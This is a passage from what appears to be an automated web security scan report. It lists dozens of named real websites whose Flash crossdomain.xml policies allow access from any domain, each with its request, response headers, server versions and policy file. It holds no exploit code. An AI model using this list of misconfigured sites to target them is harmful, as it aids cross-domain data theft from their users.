Content-Length: 106
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 00:48:04 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="*" secure="false" to-ports="*" />
</cross-domain-policy>

6.48. http://www.glidden.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.glidden.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.glidden.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:49:30 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 28 Mar 2011 19:06:21 GMT
ETag: "2ace2-c8-a39da540"
Accept-Ranges: bytes
Content-Length: 200
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<!-- This file allows all Flash content from across the web to access this web site's data. -->
<allow-access-from domain="*" />
</cross-domain-policy>

6.49. http://www.gosupermodel.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gosupermodel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gosupermodel.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"161-1292228910000"
Last-Modified: Mon, 13 Dec 2010 08:28:30 GMT
Content-Type: application/xml
Content-Length: 161
Date: Wed, 04 May 2011 04:17:44 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

6.50. http://www.healthzone.ca/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.healthzone.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.healthzone.ca

Response

HTTP/1.1 200 OK
Server: nginx/0.9.4
Date: Wed, 04 May 2011 04:18:19 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Sat, 08 Aug 2009 16:57:27 GMT
WS: 2-3
Content-Length: 164
Age: 0
Via: 1.1 varnish
X-TopsCache: topsvarnish7-1
X-Cache: MISS
Expires: Fri, 03 Jun 2011 04:18:19 GMT
Cache-Control: max-age=2592000

<?xml version="1.0"?>
<!-- http://olympics.thestar.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.51. http://www.homehealthplanet.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.homehealthplanet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.homehealthplanet.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:56:38 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 01 May 2010 05:05:32 GMT
ETag: "72ec7af-68-485814f25df00"
Accept-Ranges: bytes
Content-Length: 104
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.52. http://www.hot1079.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hot1079.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hot1079.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3188030320
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 01:21:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:21:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.53. http://www.hudong.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hudong.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hudong.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:42:34 GMT
Server: Apache
ETag: "H1ZAnjJKsCk"
Last-Modified: Thu, 24 Sep 2009 07:44:36 GMT
Accept-Ranges: bytes
Content-Length: 317
Content-Type: text/xml
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permit
...[SNIP]...

6.54. http://www.iconaircraft.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.iconaircraft.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.iconaircraft.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:14:54 GMT
Server: Apache
Last-Modified: Sun, 13 Dec 2009 00:18:36 GMT
ETag: "7c96611-d9-47a91190d6f00"
Accept-Ranges: bytes
Content-Length: 217
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cros
...[SNIP]...

6.55. http://www.incontention.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.incontention.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.incontention.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:06:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Cookie
Expires: Wed, 04 May 2011 05:06:21 GMT
Connection: close
Content-Type: text/xml; charset=UTF-8

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.56. http://www.instantpresenter.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instantpresenter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.instantpresenter.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sat, 11 Sep 2010 02:14:02 GMT
Accept-Ranges: bytes
ETag: "903fa105751cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:43:06 GMT
Connection: keep-alive
Content-Length: 198

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.57. http://www.irenewdemos.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.irenewdemos.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.irenewdemos.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:45:48 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 03 Nov 2009 14:07:11 GMT
ETag: "264aea9-c6-2a521c0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.58. http://www.itworld.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.itworld.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (EL)
Last-Modified: Wed, 22 Dec 2010 00:11:38 GMT
ETag: "2c0686-9c-497f498c98280"
Cache-Control: max-age=1209600
Content-Type: text/xml
Content-Length: 156
X-Cacheable: YES
Date: Wed, 04 May 2011 02:09:36 GMT
X-Varnish: 496766903
Via: 1.1 varnish
age: 0
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<cross-domain-policy xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*"/>
</cross-domain-policy>

6.59. http://www.jcosplay.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jcosplay.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jcosplay.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:49:01 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 10:29:05 GMT
ETag: "3e88008-8d-4cb589f1"
Accept-Ranges: bytes
Content-Length: 141
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.*" />
<allow-access-from domain="*" />
</cross-domain-policy>

6.60. http://www.jewishxdate.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jewishxdate.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jewishxdate.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:41:13 GMT
Server: Apache
Last-Modified: Fri, 11 Dec 2009 13:45:23 GMT
ETag: "3e0125-68-47a7422a6e2c0"
Accept-Ranges: bytes
Content-Length: 104
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.61. http://www.jhunewsletter.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jhunewsletter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jhunewsletter.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:21:49 GMT
Server: Apache/1.3.37 (Win32) mod_gzip/1.3.26.1a JRun/4.0
Cache-Control: max-age=1200, s-max-age=1200
Last-Modified: Mon, 14 Aug 2006 05:40:42 GMT
ETag: "0-69-44e00cda"
Accept-Ranges: bytes
Content-Length: 105
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.62. http://www.kansasspeedway.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kansasspeedway.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kansasspeedway.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 12 Dec 2008 23:09:32 GMT
Accept-Ranges: bytes
ETag: "8e12fbb0ae5cc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 347
Cache-Control: max-age=604782
Date: Wed, 04 May 2011 01:12:51 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.63. http://www.karafun.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.karafun.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.karafun.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:56:09 GMT
Server: Apache/2
Last-Modified: Mon, 25 Oct 2010 13:57:52 GMT
ETag: "94d689-d1-4937160d4f800"
Accept-Ranges: bytes
Content-Length: 209
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domai
...[SNIP]...

6.64. http://www.kedscollective.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kedscollective.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kedscollective.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:12:17 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.2 with Suhosin-Patch
Last-Modified: Fri, 16 Oct 2009 18:15:30 GMT
ETag: "974992-69-47611618d1480;476116225ab00"
Accept-Ranges: bytes
Content-Length: 105
Cache-Control: max-age=604800
Expires: Wed, 11 May 2011 04:12:17 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.65. http://www.keyhealthclub.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.keyhealthclub.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.keyhealthclub.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:14:32 GMT
Server: Apache
Last-Modified: Fri, 14 May 2010 09:52:14 GMT
ETag: "30014c3-68-4bed1d4e"
Accept-Ranges: bytes
Content-Length: 104
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.66. http://www.kiss107.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kiss107.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kiss107.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3188967027 3188957227
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 01:50:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:50:34 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.67. http://www.kissfunny.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kissfunny.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kissfunny.com

Response

HTTP/1.1 200 OK
Content-Length: 277
Content-Type: text/xml
Last-Modified: Thu, 18 Dec 2008 03:57:52 GMT
Accept-Ranges: bytes
ETag: "50d17cdc460c91:3e5f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:27:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" to-ports="*" />
   <allo
...[SNIP]...

6.68. http://www.learningcurve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.learningcurve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.learningcurve.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:56:02 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 01 Feb 2011 17:45:09 GMT
ETag: "196b6a-18d-49b3c17f33340"
Accept-Ranges: bytes
Content-Length: 397
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-onl
...[SNIP]...
<allow-access-from domain="*" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="content.learningcurve.com" />
...[SNIP]...

6.69. http://www.legalseafoods.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.legalseafoods.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.legalseafoods.com

Response

HTTP/1.1 200 OK
Content-Length: 133
Content-Type: text/xml
Content-Location: http://www.legalseafoods.com/crossdomain.xml
Last-Modified: Fri, 05 Feb 2010 23:52:02 GMT
Accept-Ranges: bytes
ETag: "b8428436bea6ca1:436"
Server: Microsoft-IIS/6.0
Date: Wed, 04 May 2011 01:56:00 GMT
Connection: close
Set-Cookie: B100Serverpoolcookie=4090937773.1.4137129920.3954557245; path=/

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.70. http://www.localfordoffer.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.localfordoffer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.localfordoffer.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 10 Jun 2010 20:56:18 GMT
Accept-Ranges: bytes
ETag: "05505fdf8cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:10:41 GMT
Connection: close
Content-Length: 240

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" to-ports="80,443" />
...[SNIP]...

6.71. http://www.machomoe.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.machomoe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.machomoe.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:54:06 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30 mod_fcgid/2.3.5
Last-Modified: Thu, 30 Sep 2010 18:55:44 GMT
ETag: "1df150-67-4917ea00dac00"
Accept-Ranges: bytes
Content-Length: 103
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.72. http://www.madtwist.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.madtwist.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.madtwist.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:52:47 GMT
Server: Apache
Last-Modified: Wed, 26 Nov 2008 15:14:07 GMT
ETag: "622804-cd-45c99144a2dc0"
Accept-Ranges: bytes
Content-Length: 205
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.73. http://www.marcjacobs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marcjacobs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marcjacobs.com

Response

HTTP/1.1 200 OK
Content-Length: 137
Content-Type: text/xml
Content-Location: http://www.marcjacobs.com/crossdomain.xml
Last-Modified: Tue, 08 Mar 2011 01:19:01 GMT
Accept-Ranges: bytes
ETag: "6710cdce2eddcb1:b07"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
sv: 5
Date: Wed, 04 May 2011 02:54:49 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>

6.74. http://www.matchbox.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.matchbox.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.matchbox.com

Response

HTTP/1.1 200 OK
Content-Length: 426
Content-Type: text/xml
Last-Modified: Thu, 29 Oct 2009 17:28:07 GMT
Accept-Ranges: bytes
ETag: "e86d162ebd58ca1:4b6"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:09:56 GMT
Connection: keep-alive
Set-Cookie: NSC_Ljet_Xfcgbsn=440af0ad3660;expires=Wed, 04-May-11 03:12:26 GMT;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="mbws.mattel.com" />
<allow-access-from domain="estwr-25-90.corp.mattel.com" />
<allow-access-from domain="battleforce5.com" />
<allow-access-from domain="dev.battleforce5.net" />
...[SNIP]...

6.75. http://www.mediapost.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediapost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mediapost.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:03:42 GMT
Server: Apache/2.2.15 (Unix) DAV/2 PHP/5.3.2 with Suhosin-Patch mod_ssl/2.2.15 OpenSSL/1.0.0a mod_wsgi/3.2 Python/2.6.5 JRun/4.0
Last-Modified: Fri, 11 Jul 2008 18:53:49 GMT
ETag: "2a7f8-10d-451c40fe5c940"
Accept-Ranges: bytes
Content-Length: 269
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for ColdFusion Multi Server Monitor access -->
<cross-domai
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.76. http://www.mertado.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mertado.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mertado.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 04 May 2011 01:33:28 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Fri, 15 Oct 2010 01:33:28 GMT
ETag: "1d14e6-66-4929dd03caa00"
Accept-Ranges: bytes
Content-Length: 102
Cache-Control: max-age=31536000
Expires: Thu, 03 May 2012 01:33:28 GMT
Vary: Accept-Encoding,User-Agent

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.77. http://www.michellebranch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.michellebranch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.michellebranch.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:02:19 GMT
Server: Apache
Vary: Host
Last-Modified: Wed, 29 Oct 2008 18:27:57 GMT
Accept-Ranges: bytes
Content-Length: 200
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 04:02:19 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.78. http://www.mix961.com/crossdomain.xml  previous  next

Summary

Severity:   High
